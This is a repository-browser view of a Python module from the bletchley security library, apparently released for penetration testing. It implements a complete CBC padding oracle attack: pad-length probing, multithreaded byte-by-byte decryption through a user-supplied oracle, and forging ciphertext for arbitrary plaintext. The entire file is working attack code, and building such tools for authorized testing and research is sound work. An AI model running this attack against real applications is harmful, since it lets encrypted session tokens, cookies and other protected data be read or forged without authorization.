source: trunk/lib/bletchley/CBC/__init__.py @ 38

Last change on this file since 38 was 38, checked in by tmorgan, 11 years ago

simplified decrypt() and interface to probe_padding()

sanity checks

File size: 13.2 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
class POA:
    """This class implements padding oracle attacks given a ciphertext and
    function that acts as a padding oracle.

    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
    This attack was first described in:
     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
      WTLS" by Serge Vaudenay (2002)

    POA objects are not caller thread-safe.  If multiple threads need to work
    simultaneously on the same ciphertext and oracle, create a
    separate instance. POA objects can execute tasks internally using
    multiple threads, however.

    All buffers (ciphertext, IV, plaintext) are byte strings.  Individual
    byte values are read through bytearray() so the same code path works
    whether indexing a byte string yields a 1-character string or an int.

    """

    ## private
    _thread_result = None
    _oracle = None
    _ciphertext = None
    _iv = None

    ## protected (reading ok, changing not ok)
    block_size = None

    ## public (r/w ok)
    decrypted = None
    threads = None
    log_fh = None

    def __init__(self, oracle, block_size, ciphertext, iv=None,
                 threads=1, decrypted=b'', log_file=None):
        """Creates a new padding oracle attack (POA) object.

        Arguments:
        oracle -- A function which returns True if the given ciphertext
         results in a correct padding upon decryption and False
         otherwise.  This function should implement the prototype:
           def myOracle(ciphertext, iv): ...
         If the initialization vector (iv) is unknown or is not included
         in the ciphertext message, it can be ignored in the oracle
         implementation (though some limitations will result from this).

        block_size -- The block size of the ciphertext being attacked.
         Is almost always 8 or 16.

        ciphertext -- The ciphertext to be decrypted

        iv -- The initialization vector associated with the ciphertext.
         If none provided, it is assumed to be a block of 0's

        threads -- The maximum number of parallel threads to use during
         decryption.  If more than one thread is used, then the oracle
         function will be called in parallel.  It should implement any
         internal locking necessary to prevent race conditions where
         applicable.

        decrypted -- If a portion of the plaintext is already known (due
         to a prior, partially successful decryption attempt), then this
         may be used to restart the decryption process where it was
         previously left off.  This argument is assumed to contain the
         final N bytes (for an N-byte argument) of the plaintext; that
         is, the tail of the plaintext including the pad.

        log_file -- A Python file object where log messages will be
         written.

        Raises:
        InvalidBlockError -- if the ciphertext is shorter than one block
         or its length (or the IV's length) is not a multiple of
         block_size.
        Exception -- if more plaintext is supplied in `decrypted` than
         there is ciphertext.

        """

        if len(ciphertext) % block_size != 0 or len(ciphertext) < block_size:
            raise InvalidBlockError(block_size, len(ciphertext))
        if iv is not None and len(iv) % block_size != 0:
            raise InvalidBlockError(block_size, len(iv))
        if len(decrypted) > len(ciphertext):
            # XXX: custom exception
            raise Exception("More decrypted bytes (%d) supplied than "
                            "ciphertext bytes (%d)"
                            % (len(decrypted), len(ciphertext)))

        self.block_size = block_size
        self.decrypted = decrypted
        self.threads = threads
        self.log_fh = log_file

        self._oracle = oracle
        self._ciphertext = ciphertext
        if iv is None:
            self._iv = b'\x00' * self.block_size
        else:
            self._iv = iv


    def log_message(self, s):
        """Writes s plus a newline to the log file, if one was supplied."""
        if self.log_fh is not None:
            self.log_fh.write(s + '\n')


    def probe_padding(self):
        """Attempts to verify that a CBC padding oracle exists and then
        determines the pad value.

        The final ciphertext block and a tweaked copy of the block
        preceding it are appended to the original ciphertext for each
        oracle query.

        Returns the pad string, or None on failure.
        XXX: Currently only works for PKCS 5/7.
        """

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
        final = blocks[-1]
        # If only one block is present, then try to use the IV as prior
        prior = self._iv if len(blocks) == 1 else blocks[-2]
        prior_bytes = bytearray(prior)

        # First probe for the beginning of the pad: corrupt one byte at a
        # time from the front of the block; the first corruption the
        # oracle rejects marks the first pad byte.  The last byte is never
        # probed, so a pad length of 1 is the fall-through result.
        pad_length = 1
        for i in range(-self.block_size, -1):
            tweaked = struct.pack("B", prior_bytes[i] ^ 0xFF)
            probe = self._ciphertext + prior[:i] + tweaked + prior[i+1:] + final
            if not self._oracle(probe, self._iv):
                pad_length = -i
                break

        self.log_message("Testing suspected pad length: %d" % pad_length)

        ret_val = None
        if pad_length > 1:
            # Verify suspected pad length by changing last pad byte to 1
            # and making sure the padding succeeds
            tweaked = struct.pack("B", prior_bytes[-1] ^ (pad_length ^ 1))
            probe = self._ciphertext + prior[:-1] + tweaked + final
            if self._oracle(probe, self._iv):
                ret_val = buffertools.pkcs7Pad(pad_length)
        else:
            # Verify by changing pad byte to 2 and brute-force changing
            # second-to-last byte to 2 as well.  j == 0 is included because
            # the second-to-last plaintext byte may already be 2.
            tweaked = struct.pack("B", prior_bytes[-1] ^ (2 ^ 1))
            for j in range(256):
                guess = struct.pack("B", prior_bytes[-2] ^ j)
                probe = self._ciphertext + prior[:-2] + guess + tweaked + final
                if self._oracle(probe, self._iv):
                    # XXX: Save the decrypted byte for later
                    ret_val = buffertools.pkcs7Pad(pad_length)
                    # One confirmation is enough; stop querying the oracle
                    break

        return ret_val


    # XXX: This could be generalized as a byte probe utility for a variety of attacks
    def _test_value_set(self, prefix, suffix, value_set):
        """Thread worker: queries the oracle with prefix+byte+suffix for
        each byte value in value_set and records the first accepted value
        in self._thread_result.
        """
        for b in value_set:
            if self._thread_result is not None:
                # Stop if another thread found the result
                break
            if self._oracle(bytes(prefix + struct.pack("B", b) + suffix), self._iv):
                self._thread_result = b
                break


    def decrypt_next_byte(self, prior, block, known_bytes, cache=True):
        """Decrypts one byte of ciphertext by modifying the prior
        ciphertext block at the same relative offset.

        Arguments:
        prior -- Ciphertext block appearing prior to the current target
        block -- Currently targeted ciphertext block
        known_bytes -- Bytes in this block already decrypted
        cache -- If True (the default), the newly recovered byte is also
         prepended to self.decrypted.  Pass False when the block being
         worked on is not part of the original message (e.g. during
         encryption), so the saved plaintext is not polluted.

        Returns the newly decrypted byte followed by known_bytes, or
        known_bytes unchanged if the block is already fully decrypted.

        Raises:
        InvalidBlockError -- if block is not exactly block_size long.
        Exception -- if no byte value satisfies the oracle.

        """

        if len(block) != self.block_size:
            raise InvalidBlockError(self.block_size, len(block))

        num_known = len(known_bytes)
        if num_known >= self.block_size:
            return known_bytes

        prior_values = bytearray(prior)
        known_values = bytearray(known_bytes)
        pad_value = num_known + 1
        target = self.block_size - num_known - 1

        prior_prefix = prior[0:target]
        base = prior_values[target]

        # Adjust known bytes to appear as a PKCS 7 pad
        tail = prior_values[len(prior_values) - num_known:]
        forged = bytearray(p ^ k ^ pad_value
                           for p, k in zip(tail, known_values))
        suffix = bytes(forged) + block

        # Each thread spawned searches a subset of the next byte's
        # 256 possible values
        self._thread_result = None
        workers = []
        for i in range(0, self.threads):
            t = threading.Thread(target=self._test_value_set,
                                 args=(self._ciphertext + prior_prefix, suffix,
                                       range(i, 256, self.threads)))
            t.start()
            workers.append(t)

        for t in workers:
            t.join()

        if self._thread_result is None:
            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
            # XXX: custom exception
            raise Exception("Value of a byte could not be determined")

        decrypted = struct.pack("B", self._thread_result ^ base ^ pad_value)
        if cache:
            self.decrypted = decrypted + self.decrypted
        #  Return previous bytes together with current byte
        return decrypted + known_bytes


    def decrypt_block(self, prior, block, last_bytes=b'', cache=True):
        """Decrypts the block of ciphertext provided as a parameter.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the target block
        block -- The ciphertext block to decrypt
        last_bytes -- Trailing plaintext bytes of this block that are
         already known, if any
        cache -- Forwarded to decrypt_next_byte(); controls whether
         recovered bytes are also saved in self.decrypted

        Returns the block_size bytes of plaintext for this block.

        """

        while len(last_bytes) != self.block_size:
            last_bytes = self.decrypt_next_byte(prior, block, last_bytes, cache)

        self.log_message("Decrypted block: %s" % repr(last_bytes))
        return last_bytes


    def decrypt(self):
        """Decrypts the previously supplied ciphertext. If the IV was
        not provided, it assumes an IV of zero bytes.

        Returns the plaintext with its PKCS7 padding stripped.

        Raises:
        Exception -- if the padding probe fails or a byte cannot be
         determined.

        """

        if not self.decrypted:
            # First decrypt the padding (quick to decrypt and good sanity check)
            pad_bytes = self.probe_padding()
            if pad_bytes is None:
                # XXX: custom exception
                raise Exception("Could not determine padding; "
                                "is this really a padding oracle?")

            self.decrypted = pad_bytes

        # Start where we left off last, whether that be with just a pad,
        # or with additional decrypted blocks.

        # number of bytes in any partially decrypted blocks
        num_partial = len(self.decrypted) % self.block_size

        # number of blocks fully decrypted
        finished_blocks = len(self.decrypted) // self.block_size

        # contents of the partial block
        partial = self.decrypted[0:num_partial]

        # contents of fully decrypted blocks
        decrypted = self.decrypted[num_partial:]

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)

        # Start with the partially decrypted block at the end, and work
        # our way to the front.  Don't decrypt the very first block of
        # the ciphertext yet.
        for i in range(len(blocks)-1-finished_blocks, 0, -1):
            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
            partial = b''

        # Finally decrypt first block, unless a resumed session already
        # holds plaintext for every block (otherwise the first block would
        # be decrypted and prepended a second time).
        if finished_blocks < len(blocks):
            decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted

        # Remove the padding and return
        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)


    def encrypt_block(self, plaintext, ciphertext):
        """Encrypts a block of plaintext.  This is accomplished by
        decrypting the supplied ciphertext and then computing the prior
        block needed to create the desired plaintext at the ciphertext's
        location.

        Returns the calculated prior block and the provided ciphertext
        block as a tuple.

        Raises InvalidBlockError if either argument is not exactly
        block_size long.

        """
        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
            raise InvalidBlockError(self.block_size, len(plaintext))

        # cache=False: these bytes belong to a forged block, not to the
        # original message, so they must not end up in self.decrypted.
        ptext = self.decrypt_block(b'\x00' * self.block_size, ciphertext,
                                   cache=False)
        prior = buffertools.xorBuffers(ptext, plaintext)
        return prior, ciphertext


    def encrypt(self, plaintext):
        """Encrypts a plaintext value through "CBC-R" style prior-block
        propagation.

        Returns a tuple of the IV and ciphertext.

        NOTE: If your target messages do not include an IV with the
        ciphertext, you can instead opt to encrypt a suffix of the
        message and include the IV in the middle of the ciphertext as
        if it were an encrypted block. This one block alone will decrypt
        to an uncontrollable random value, but with careful placement,
        this might be ok.

        """

        bs = self.block_size
        blocks = buffertools.splitBuffer(
            buffertools.pkcs7PadBuffer(plaintext, bs), bs)

        if len(self.decrypted) >= bs and len(self._ciphertext) >= 2*bs:
            # If possible, reuse work from prior decryption efforts on original
            # message for last block
            old_prior = self._ciphertext[-2*bs:-bs]
            final_plaintext = self.decrypted[-bs:]
            prior = buffertools.xorBuffers(
                old_prior,
                buffertools.xorBuffers(final_plaintext, blocks[-1]))
            ciphertext = self._ciphertext[-bs:]
        else:
            # Otherwise, select a random last block and generate the prior block
            ciphertext = struct.pack("B" * bs,
                                     *[random.getrandbits(8) for i in range(bs)])
            prior, ciphertext = self.encrypt_block(blocks[-1], ciphertext)

        # Continue generating all prior blocks
        for i in range(len(blocks)-2, -1, -1):
            prior, cblock = self.encrypt_block(blocks[i], prior)
            ciphertext = cblock + ciphertext

        # prior as IV
        return bytes(prior), bytes(ciphertext)
Note: See TracBrowser for help on using the repository browser.